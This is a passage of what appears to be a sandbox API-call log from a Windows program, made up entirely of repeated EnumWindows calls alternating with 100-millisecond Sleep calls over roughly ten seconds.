(dwMilliseconds=0x64) [0188.840] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0188.840] Sleep (dwMilliseconds=0x64) [0188.887] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0188.891] Sleep (dwMilliseconds=0x64) [0188.924] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0188.925] Sleep (dwMilliseconds=0x64) [0188.941] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0188.946] Sleep (dwMilliseconds=0x64) [0188.985] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0188.986] Sleep (dwMilliseconds=0x64) [0189.034] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0189.035] Sleep (dwMilliseconds=0x64) [0189.263] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0189.265] Sleep (dwMilliseconds=0x64) [0189.342] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0189.343] Sleep (dwMilliseconds=0x64) [0189.497] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0189.499] Sleep (dwMilliseconds=0x64) [0189.566] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0189.567] Sleep (dwMilliseconds=0x64) [0189.610] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0189.611] Sleep (dwMilliseconds=0x64) [0189.725] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0189.726] Sleep (dwMilliseconds=0x64) [0189.744] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0189.744] Sleep (dwMilliseconds=0x64) [0189.746] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0189.747] Sleep (dwMilliseconds=0x64) [0189.778] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0189.781] Sleep (dwMilliseconds=0x64) [0189.825] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0189.828] Sleep (dwMilliseconds=0x64) [0189.872] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0189.875] Sleep (dwMilliseconds=0x64) [0189.931] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0189.932] Sleep (dwMilliseconds=0x64) [0189.935] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0189.936] Sleep (dwMilliseconds=0x64) [0189.950] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0189.953] Sleep (dwMilliseconds=0x64) [0189.997] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0190.000] Sleep (dwMilliseconds=0x64) [0190.046] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0190.046] Sleep (dwMilliseconds=0x64) [0190.061] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0190.062] Sleep (dwMilliseconds=0x64) [0190.117] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0190.118] Sleep (dwMilliseconds=0x64) [0190.157] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0190.157] Sleep (dwMilliseconds=0x64) [0190.171] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0190.171] Sleep (dwMilliseconds=0x64) [0190.187] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0190.188] Sleep (dwMilliseconds=0x64) [0190.235] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0190.236] Sleep (dwMilliseconds=0x64) [0190.256] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0190.256] Sleep (dwMilliseconds=0x64) [0190.262] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0190.263] Sleep (dwMilliseconds=0x64) [0190.281] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0190.281] Sleep (dwMilliseconds=0x64) [0190.328] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0190.328] Sleep (dwMilliseconds=0x64) [0190.352] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0190.353] Sleep (dwMilliseconds=0x64) [0190.356] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0190.356] Sleep (dwMilliseconds=0x64) [0190.374] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0190.375] Sleep (dwMilliseconds=0x64) [0190.422] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0190.424] Sleep (dwMilliseconds=0x64) [0190.441] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0190.442] Sleep (dwMilliseconds=0x64) [0190.450] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0190.450] Sleep (dwMilliseconds=0x64) [0190.511] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0190.513] Sleep (dwMilliseconds=0x64) [0190.564] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0190.565] Sleep (dwMilliseconds=0x64) [0190.594] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0190.594] Sleep (dwMilliseconds=0x64) [0190.606] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0190.606] Sleep (dwMilliseconds=0x64) [0190.627] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0190.627] Sleep (dwMilliseconds=0x64) [0190.671] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0190.672] Sleep (dwMilliseconds=0x64) [0190.769] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0190.770] Sleep (dwMilliseconds=0x64) [0190.778] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0190.778] Sleep (dwMilliseconds=0x64) [0190.827] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0190.828] Sleep (dwMilliseconds=0x64) [0190.874] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0190.875] Sleep (dwMilliseconds=0x64) [0190.921] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0190.921] Sleep (dwMilliseconds=0x64) [0190.962] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0190.963] Sleep (dwMilliseconds=0x64) [0190.966] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0190.967] Sleep (dwMilliseconds=0x64) [0191.012] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0191.013] Sleep (dwMilliseconds=0x64) [0191.050] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0191.051] Sleep (dwMilliseconds=0x64) [0191.061] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0191.062] Sleep (dwMilliseconds=0x64) [0191.077] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0191.077] Sleep (dwMilliseconds=0x64) [0191.140] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0191.141] Sleep (dwMilliseconds=0x64) [0191.168] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0191.169] Sleep (dwMilliseconds=0x64) [0191.186] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0191.187] Sleep (dwMilliseconds=0x64) [0191.233] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0191.234] Sleep (dwMilliseconds=0x64) [0191.254] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0191.255] Sleep (dwMilliseconds=0x64) [0191.264] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0191.265] Sleep (dwMilliseconds=0x64) [0191.294] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0191.298] Sleep (dwMilliseconds=0x64) [0191.340] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0191.341] Sleep (dwMilliseconds=0x64) [0191.390] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0191.391] Sleep (dwMilliseconds=0x64) [0191.436] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0191.437] Sleep (dwMilliseconds=0x64) [0191.483] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0191.484] Sleep (dwMilliseconds=0x64) [0191.519] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0191.523] Sleep (dwMilliseconds=0x64) [0191.527] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0191.528] Sleep (dwMilliseconds=0x64) [0191.546] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0191.547] Sleep (dwMilliseconds=0x64) [0191.591] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0191.594] Sleep (dwMilliseconds=0x64) [0191.638] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0191.641] Sleep (dwMilliseconds=0x64) [0191.744] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0191.745] Sleep (dwMilliseconds=0x64) [0191.798] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0191.799] Sleep (dwMilliseconds=0x64) [0191.840] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0191.841] Sleep (dwMilliseconds=0x64) [0191.888] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0191.891] Sleep (dwMilliseconds=0x64) [0191.937] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0191.938] Sleep (dwMilliseconds=0x64) [0191.983] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0191.984] Sleep (dwMilliseconds=0x64) [0192.009] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0192.010] Sleep (dwMilliseconds=0x64) [0192.013] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0192.014] Sleep (dwMilliseconds=0x64) [0192.028] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0192.029] Sleep (dwMilliseconds=0x64) [0192.077] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0192.078] Sleep (dwMilliseconds=0x64) [0192.115] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0192.116] Sleep (dwMilliseconds=0x64) [0192.121] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0192.122] Sleep (dwMilliseconds=0x64) [0192.168] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0192.169] Sleep (dwMilliseconds=0x64) [0192.216] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0192.217] Sleep (dwMilliseconds=0x64) [0192.471] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0192.472] Sleep (dwMilliseconds=0x64) [0192.542] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0192.543] Sleep (dwMilliseconds=0x64) [0192.593] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0192.594] Sleep (dwMilliseconds=0x64) [0192.631] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0192.631] Sleep (dwMilliseconds=0x64) [0192.637] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0192.637] Sleep (dwMilliseconds=0x64) [0192.715] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0192.716] Sleep (dwMilliseconds=0x64) [0192.754] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0192.755] Sleep (dwMilliseconds=0x64) [0192.765] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0192.766] Sleep (dwMilliseconds=0x64) [0192.780] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0192.781] Sleep (dwMilliseconds=0x64) [0192.827] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0192.828] Sleep (dwMilliseconds=0x64) [0192.853] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0192.854] Sleep (dwMilliseconds=0x64) [0192.858] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0192.859] Sleep (dwMilliseconds=0x64) [0192.872] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0192.887] Sleep (dwMilliseconds=0x64) [0193.187] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0193.188] Sleep (dwMilliseconds=0x64) [0193.212] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0193.212] Sleep (dwMilliseconds=0x64) [0193.215] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0193.215] Sleep (dwMilliseconds=0x64) [0193.249] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0193.250] Sleep (dwMilliseconds=0x64) [0193.294] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0193.297] Sleep (dwMilliseconds=0x64) [0193.358] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0193.359] Sleep (dwMilliseconds=0x64) [0193.403] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0193.406] Sleep (dwMilliseconds=0x64) [0193.497] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0193.500] Sleep (dwMilliseconds=0x64) [0193.568] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0193.569] Sleep (dwMilliseconds=0x64) [0193.610] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0193.610] Sleep (dwMilliseconds=0x64) [0193.621] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0193.625] Sleep (dwMilliseconds=0x64) [0193.656] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0193.657] Sleep (dwMilliseconds=0x64) [0193.745] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0193.746] Sleep (dwMilliseconds=0x64) [0193.780] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0193.781] Sleep (dwMilliseconds=0x64) [0193.794] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0193.794] Sleep (dwMilliseconds=0x64) [0193.861] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0193.862] Sleep (dwMilliseconds=0x64) [0193.926] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0193.927] Sleep (dwMilliseconds=0x64) [0193.946] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0193.946] Sleep (dwMilliseconds=0x64) [0193.949] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0193.950] Sleep (dwMilliseconds=0x64) [0193.999] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0194.000] Sleep (dwMilliseconds=0x64) [0194.041] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0194.042] Sleep (dwMilliseconds=0x64) [0194.044] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0194.044] Sleep (dwMilliseconds=0x64) [0194.061] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0194.062] Sleep (dwMilliseconds=0x64) [0194.115] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0194.116] Sleep (dwMilliseconds=0x64) [0194.134] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0194.137] Sleep (dwMilliseconds=0x64) [0194.168] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0194.169] Sleep (dwMilliseconds=0x64) [0194.248] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0194.248] Sleep (dwMilliseconds=0x64) [0194.297] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0194.298] Sleep (dwMilliseconds=0x64) [0194.323] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0194.324] Sleep (dwMilliseconds=0x64) [0194.341] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0194.342] Sleep (dwMilliseconds=0x64) [0194.387] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0194.388] Sleep (dwMilliseconds=0x64) [0194.414] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0194.415] Sleep (dwMilliseconds=0x64) [0194.418] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0194.419] Sleep (dwMilliseconds=0x64) [0194.459] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0194.461] Sleep (dwMilliseconds=0x64) [0194.498] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0194.498] Sleep (dwMilliseconds=0x64) [0194.543] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0194.544] Sleep (dwMilliseconds=0x64) [0194.591] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0194.593] Sleep (dwMilliseconds=0x64) [0194.653] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0194.657] Sleep (dwMilliseconds=0x64) [0194.703] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0194.704] Sleep (dwMilliseconds=0x64) [0194.756] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0194.757] Sleep (dwMilliseconds=0x64) [0194.762] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0194.763] Sleep (dwMilliseconds=0x64) [0194.797] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0194.798] Sleep (dwMilliseconds=0x64) [0194.840] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0194.841] Sleep (dwMilliseconds=0x64) [0194.874] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0194.875] Sleep (dwMilliseconds=0x64) [0194.890] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0194.891] Sleep (dwMilliseconds=0x64) [0194.938] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0194.939] Sleep (dwMilliseconds=0x64) [0195.000] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0195.000] Sleep (dwMilliseconds=0x64) [0195.062] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0195.063] Sleep (dwMilliseconds=0x64) [0195.115] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0195.116] Sleep (dwMilliseconds=0x64) [0195.149] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0195.277] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0195.278] Sleep (dwMilliseconds=0x64) [0195.372] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0195.373] Sleep (dwMilliseconds=0x64) [0195.390] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0195.390] Sleep (dwMilliseconds=0x64) [0195.403] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0195.404] Sleep (dwMilliseconds=0x64) [0195.434] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0195.435] Sleep (dwMilliseconds=0x64) [0195.481] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0195.482] Sleep (dwMilliseconds=0x64) [0195.544] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0195.545] Sleep (dwMilliseconds=0x64) [0195.575] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0195.576] Sleep (dwMilliseconds=0x64) [0195.590] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0195.591] Sleep (dwMilliseconds=0x64) [0195.638] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0195.639] Sleep (dwMilliseconds=0x64) [0195.678] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0195.679] Sleep (dwMilliseconds=0x64) [0195.684] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0195.685] Sleep (dwMilliseconds=0x64) [0195.700] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0195.705] Sleep (dwMilliseconds=0x64) [0195.794] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0195.795] Sleep (dwMilliseconds=0x64) [0195.845] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0195.846] Sleep (dwMilliseconds=0x64) [0195.903] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0195.907] Sleep (dwMilliseconds=0x64) [0195.950] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0195.954] Sleep (dwMilliseconds=0x64) [0195.968] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0195.969] Sleep (dwMilliseconds=0x64) [0195.981] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0195.984] Sleep (dwMilliseconds=0x64) [0196.047] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0196.048] Sleep (dwMilliseconds=0x64) [0196.095] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0196.096] Sleep (dwMilliseconds=0x64) [0196.122] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0196.123] Sleep (dwMilliseconds=0x64) [0196.137] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0196.138] Sleep (dwMilliseconds=0x64) [0196.171] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0196.172] Sleep (dwMilliseconds=0x64) [0196.218] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0196.219] Sleep (dwMilliseconds=0x64) [0196.265] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0196.265] Sleep (dwMilliseconds=0x64) [0196.312] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0196.313] Sleep (dwMilliseconds=0x64) [0196.343] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0196.344] Sleep (dwMilliseconds=0x64) [0196.356] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0196.357] Sleep (dwMilliseconds=0x64) [0196.372] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0196.376] Sleep (dwMilliseconds=0x64) [0196.423] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0196.424] Sleep (dwMilliseconds=0x64) [0196.464] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0196.469] Sleep (dwMilliseconds=0x64) [0196.483] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0196.484] Sleep (dwMilliseconds=0x64) [0196.544] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0196.547] Sleep (dwMilliseconds=0x64) [0196.579] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0196.579] Sleep (dwMilliseconds=0x64) [0196.593] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0196.594] Sleep (dwMilliseconds=0x64) [0196.613] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0196.614] Sleep (dwMilliseconds=0x64) [0196.653] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0196.654] Sleep (dwMilliseconds=0x64) [0196.701] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0196.702] Sleep (dwMilliseconds=0x64) [0196.750] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0196.751] Sleep (dwMilliseconds=0x64) [0196.819] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0196.820] Sleep (dwMilliseconds=0x64) [0196.824] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0196.825] Sleep (dwMilliseconds=0x64) [0196.872] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0196.876] Sleep (dwMilliseconds=0x64) [0196.919] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0196.920] Sleep (dwMilliseconds=0x64) [0196.966] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0196.967] Sleep (dwMilliseconds=0x64) [0197.012] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0197.013] Sleep (dwMilliseconds=0x64) [0197.059] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0197.060] Sleep (dwMilliseconds=0x64) [0197.116] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0197.117] Sleep (dwMilliseconds=0x64) [0197.129] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0197.130] Sleep (dwMilliseconds=0x64) [0197.137] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0197.138] Sleep (dwMilliseconds=0x64) [0197.168] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0197.169] Sleep (dwMilliseconds=0x64) [0197.215] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0197.216] Sleep (dwMilliseconds=0x64) [0197.256] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0197.256] Sleep (dwMilliseconds=0x64) [0197.262] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0197.263] Sleep (dwMilliseconds=0x64) [0197.295] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0197.296] Sleep (dwMilliseconds=0x64) [0197.341] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0197.342] Sleep (dwMilliseconds=0x64) [0197.387] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0197.388] Sleep (dwMilliseconds=0x64) [0197.465] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0197.466] Sleep (dwMilliseconds=0x64) [0197.513] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0197.514] Sleep (dwMilliseconds=0x64) [0197.555] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0197.556] Sleep (dwMilliseconds=0x64) [0197.559] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0197.560] Sleep (dwMilliseconds=0x64) [0197.606] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0197.607] Sleep (dwMilliseconds=0x64) [0197.653] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0197.654] Sleep (dwMilliseconds=0x64) [0197.715] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0197.716] Sleep (dwMilliseconds=0x64) [0197.765] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0197.766] Sleep (dwMilliseconds=0x64) [0197.846] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0197.848] Sleep (dwMilliseconds=0x64) [0197.910] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0197.911] Sleep (dwMilliseconds=0x64) [0197.963] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0197.964] Sleep (dwMilliseconds=0x64) [0198.017] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0198.018] Sleep (dwMilliseconds=0x64) [0198.059] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0198.063] Sleep (dwMilliseconds=0x64) [0198.124] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0198.125] Sleep (dwMilliseconds=0x64) [0198.172] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0198.173] Sleep (dwMilliseconds=0x64) [0198.187] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0198.189] Sleep (dwMilliseconds=0x64) [0198.200] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0198.204] Sleep (dwMilliseconds=0x64) [0198.249] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0198.250] Sleep (dwMilliseconds=0x64) [0198.298] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0198.299] Sleep (dwMilliseconds=0x64) [0198.312] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0198.313] Sleep (dwMilliseconds=0x64) [0198.359] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0198.360] Sleep (dwMilliseconds=0x64) [0198.403] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0198.404] Sleep (dwMilliseconds=0x64) [0198.451] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0198.451] Sleep (dwMilliseconds=0x64) [0198.497] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0198.498] Sleep (dwMilliseconds=0x64) [0198.543] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0198.544] Sleep (dwMilliseconds=0x64) [0198.637] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0198.638] Sleep (dwMilliseconds=0x64) [0198.684] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0198.685] Sleep (dwMilliseconds=0x64) [0198.734] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0198.735] Sleep (dwMilliseconds=0x64) [0198.752] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0198.753] Sleep (dwMilliseconds=0x64) [0198.762] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0198.763] Sleep (dwMilliseconds=0x64) [0198.833] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0198.834] Sleep (dwMilliseconds=0x64) [0199.123] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0199.124] Sleep (dwMilliseconds=0x64) [0199.187] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0199.188] Sleep (dwMilliseconds=0x64) [0199.231] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0199.232] Sleep (dwMilliseconds=0x64) [0199.277] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0199.277] Sleep (dwMilliseconds=0x64) [0199.342] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0199.343] Sleep (dwMilliseconds=0x64) [0199.368] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0199.368] Sleep (dwMilliseconds=0x64) 